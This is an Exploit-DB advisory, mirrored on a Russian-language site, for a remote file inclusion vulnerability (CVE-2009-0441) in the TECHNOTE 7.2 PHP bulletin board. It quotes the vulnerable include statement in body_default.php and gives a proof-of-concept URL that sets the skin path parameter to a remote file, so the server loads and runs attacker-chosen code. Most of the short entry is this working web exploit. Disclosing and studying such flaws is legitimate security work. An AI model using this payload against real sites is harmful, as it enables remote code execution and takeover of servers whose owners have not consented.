- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7965
- Проверка EDB
-
- Пройдено
- Автор
- MAKE0DAY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-0441
- Дата публикации
- 2009-02-03
Код:
TECHNOTE 7.2 (08.09.25) Remote File Inclusion Vulnerability
bY [email protected]
/*************************
TECHNOTE (VERSION 7.2 (08.09.25))is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.
Here is the details:
**************************/
TEST ON VERSION TECHNOTE 7.2 (08.09.25)
Download : http://www.technote.co.kr/
/***************************
Remote File Inclusion Vulnerability
/body_default.php
if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";
//File Include
*************************/
poc:
http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]
# milw0rm.com [2009-02-03]
- Источник
- www.exploit-db.com